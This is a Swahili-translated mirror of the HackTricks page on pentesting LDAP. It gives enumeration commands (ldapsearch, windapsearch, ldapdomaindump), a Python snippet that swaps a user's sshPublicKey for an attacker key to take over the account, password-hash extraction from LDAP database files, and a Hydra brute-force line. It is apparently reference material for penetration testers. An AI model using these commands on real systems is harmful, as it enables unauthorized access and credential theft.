Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 14:40:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-ldap.md

17 KiB
Raw Blame History

389, 636, 3268, 3269 - Pentesting LDAP

Jifunze kuhack AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Matumizi ya LDAP (Itifaki ya Upatikanaji wa Miongozo ya Kupunguzwa) ni hasa kwa kutambua miundo mbalimbali kama vile mashirika, watu binafsi, na rasilimali kama faili na vifaa ndani ya mitandao, za umma na za kibinafsi. Inatoa njia iliyopunguzwa ikilinganishwa na mtangulizi wake, DAP, kwa kuwa na kiasi kidogo cha msimbo.

Vidokezo vya LDAP vimepangwa kuruhusu usambazaji wao kwenye seva kadhaa, kila seva ikiwa na toleo lililorudufishwa na kusawazishwa la miongozo, inayoitwa Wakala wa Mfumo wa Miongozo (DSA). Jukumu la kushughulikia maombi liko kabisa kwa seva ya LDAP, ambayo inaweza kuwasiliana na DSAs nyingine kama inavyohitajika kutoa jibu la pamoja kwa mwenyeombaji.

Ukadiriaji wa miongozo ya LDAP unaonekana kama hiraki ya mti, ikiwaanza na miongozo ya mzizi juu. Hii inatengana hadi nchi, ambazo zinagawanyika zaidi katika mashirika, na kisha kwenye vitengo vya shirika vinavyowakilisha sehemu mbalimbali au idara, hatimaye kufikia kiwango cha miundo ya mtu binafsi, ikiwa ni pamoja na watu na rasilimali zilizoshiriki kama faili na printa.

Bandari ya chaguo-msingi: 389 na 636 (ldaps). Katalogi ya Kimataifa (LDAP katika ActiveDirectory) inapatikana kwa chaguo-msingi kwenye bandari 3268, na 3269 kwa LDAPS.

PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped

Fomati ya Kubadilishana Data ya LDAP

LDIF (LDAP Data Interchange Format) inadefini maudhui ya saraka kama seti ya rekodi. Pia inaweza kuwakilisha maombi ya marekebisho (Ongeza, Badilisha, Futa, Badilisha Jina).

dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
  • Mistari 1-3 yanafafanua kikoa cha kiwango cha juu local
  • Mistari 5-8 yanafafanua kikoa cha kiwango cha kwanza moneycorp (moneycorp.local)
  • Mistari 10-16 yanafafanua vitengo viwili vya shirika: dev na mauzo
  • Mistari 18-26 yanajenga kitu cha kikoa na kumtaja sifa na thamani

Andika data

Tafadhali kumbuka kwamba ukibadilisha thamani unaweza kufanya vitendo vya kuvutia sana. Kwa mfano, fikiria kwamba unaweza kubadilisha habari ya "sshPublicKey" ya mtumiaji wako au mtumiaji yeyote. Ni jambo la uwezekano mkubwa kwamba ikiwa sifa hii ipo, basi ssh inasoma funguo za umma kutoka LDAP. Ikiwa unaweza kubadilisha funguo la umma la mtumiaji, utaweza kuingia kama mtumiaji hata kama uthibitishaji wa nenosiri haujaanzishwa katika ssh.

# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})

Kunasa manenos ya siri kwa wazi

Ikiwa LDAP inatumika bila SSL unaweza kunasa manenos ya siri kwa wazi kwenye mtandao.

Pia, unaweza kufanya shambulio la MITM kwenye mtandao kati ya seva ya LDAP na mteja. Hapa unaweza kufanya Shambulio la Kupunguza ili mteja atumie manenos ya siri kwa wazi kuingia.

Ikiwa SSL inatumika unaweza kujaribu kufanya MITM kama ilivyotajwa hapo juu lakini kwa kutoa cheti bandia, ikiwa mtumiaji atakubali, unaweza Kupunguza njia ya uthibitisho na kuona tena manenos ya siri.

Upatikanaji wa Anonimasi

Kupita ukaguzi wa TLS SNI

Kulingana na makala hii kwa tu kwa kufikia seva ya LDAP na jina la uwanja la kiholela (kama kampuni.com) alikuwa na uwezo wa kuwasiliana na huduma ya LDAP na kutoa habari kama mtumiaji asiyejulikana:

ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +

Kujumuishwa kwa LDAP bila kujulikana

Kujumuishwa kwa LDAP bila kujulikana inaruhusu wahalifu wasiothibitishwa kupata habari kutoka kwa uwanja, kama orodha kamili ya watumiaji, vikundi, kompyuta, sifa za akaunti ya mtumiaji, na sera ya nenosiri la uwanja. Hii ni mipangilio ya zamani, na kuanzia Windows Server 2003, watumiaji waliothibitishwa pekee wanaruhusiwa kuanzisha maombi ya LDAP.
Hata hivyo, waendeshaji wa mfumo wanaweza kuwa wamehitaji kuweka programu fulani kuruhusu kujumuishwa kwa siri na kutoa ufikiaji zaidi kuliko ilivyokusudiwa, hivyo kuwapa watumiaji wasiothibitishwa ufikiaji wa vitu vyote katika AD.

Vibali Sahihi

Ikiwa una vibali sahihi kuingia kwenye seva ya LDAP, unaweza kudumpisha habari yote kuhusu Msimamizi wa Uwanja kwa kutumia:

ldapdomaindump

pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]

Kuvunja nguvu

Uchambuzi

Kiotomatiki

Kwa kutumia hii utaweza kuona taarifa za umma (kama jina la uwanja):

nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials

Python

Angalia uorodheshaji wa LDAP na python

Unaweza kujaribu kuorodhesha LDAP bila au na kutumia python: pip3 install ldap3

Kwanza jaribu kuunganisha bila kutumia sifa:

>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info

Ikiwa jibu ni True kama ilivyokuwa kwenye mfano uliopita, unaweza kupata baadhi ya data za kuvutia za seva ya LDAP (kama muktadha wa jina au jina la uwanja) kutoka:

>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN

Baada ya kupata muktadha wa jina unaweza kufanya maswali mazuri zaidi. Hili swali rahisi linapaswa kuonyesha vitu vyote katika orodha:

>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries

Au tolea ldap nzima:

>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries

windapsearch

Windapsearch ni skripti ya Python inayofaa kwa kutambua watumiaji, vikundi, na kompyuta kutoka kwenye kikoa cha Windows kwa kutumia matakwa ya LDAP.

# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users

ldapsearch

Angalia vyeo vya null au ikiwa vyeo vyako ni halali:

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839

Ikiwa unapata kitu kinasema kwamba "bind lazima ikamilike" inamaanisha kuwa sifa za kuingia sio sahihi.

Unaweza kutoa kila kitu kutoka kwa kikoa kwa kutumia:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given

Chambua watumiaji:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"

Chuja kompyuta:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"

Chambua mimi info:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Hakikisha kuchunguza Domain Admins:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Hakikisha kuwa unachunguza kikamilifu kikundi cha Watumiaji wa Kikoa:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Hakikisha unapata idadi ya kikundi cha Enterprise Admins.

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Chimbua Waadiministrata:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Chunguza Kikundi cha Remote Desktop:

Kichunguzi cha Kikundi cha Remote Desktop:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Ili kuona kama una ufikivu wa nenosiri lolote unaweza kutumia grep baada ya kutekeleza moja ya maswali:

<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"

pbis

Unaweza kupakua pbis kutoka hapa: https://github.com/BeyondTrust/pbis-open/ na kawaida huiweka katika /opt/pbis.
Pbis inakuruhusu kupata habari za msingi kwa urahisi:

#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done

Interface ya Picha

Apache Directory

Pakua Apache Directory kutoka hapa. Unaweza kupata mfano wa jinsi ya kutumia chombo hiki hapa.

jxplorer

Unaweza kupakua interface ya picha na seva ya LDAP hapa: http://www.jxplorer.org/downloads/users.html

Kwa chaguo-msingi inasakinishwa katika: /opt/jxplorer

Godap

Unaweza kupata hapa https://github.com/Macmod/godap

Uthibitishaji kupitia kerberos

Kwa kutumia ldapsearch unaweza kuthibitisha dhidi ya kerberos badala ya kupitia NTLM kwa kutumia parameter -Y GSSAPI

POST

Ikiwa unaweza kupata faili ambapo mabadiliko yanapatikana (inaweza kuwa katika /var/lib/ldap). Unaweza kutoa hash kutumia:

cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u

Unaweza kumlisha john na hash ya nenosiri (kutoka '{SSHA}' hadi 'structural' bila kuongeza 'structural').

Faili za Usanidi

  • Kwa Ujumla
  • containers.ldif
  • ldap.cfg
  • ldap.conf
  • ldap.xml
  • ldap-config.xml
  • ldap-realm.xml
  • slapd.conf
  • Seva ya IBM SecureWay V3
  • V3.sas.oc
  • Seva ya Microsoft Active Directory
  • msadClassesAttrs.ldif
  • Seva ya Miongozo ya Netscape 4
  • nsslapd.sas_at.conf
  • nsslapd.sas_oc.conf
  • Seva ya OpenLDAP
  • slapd.sas_at.conf
  • slapd.sas_oc.conf
  • Seva ya Sun ONE Directory 5.1
  • 75sas.ldif

Amri za Kiotomatiki za HackTricks

Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.

https://book.hacktricks.xyz/pentesting/pentesting-ldap

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: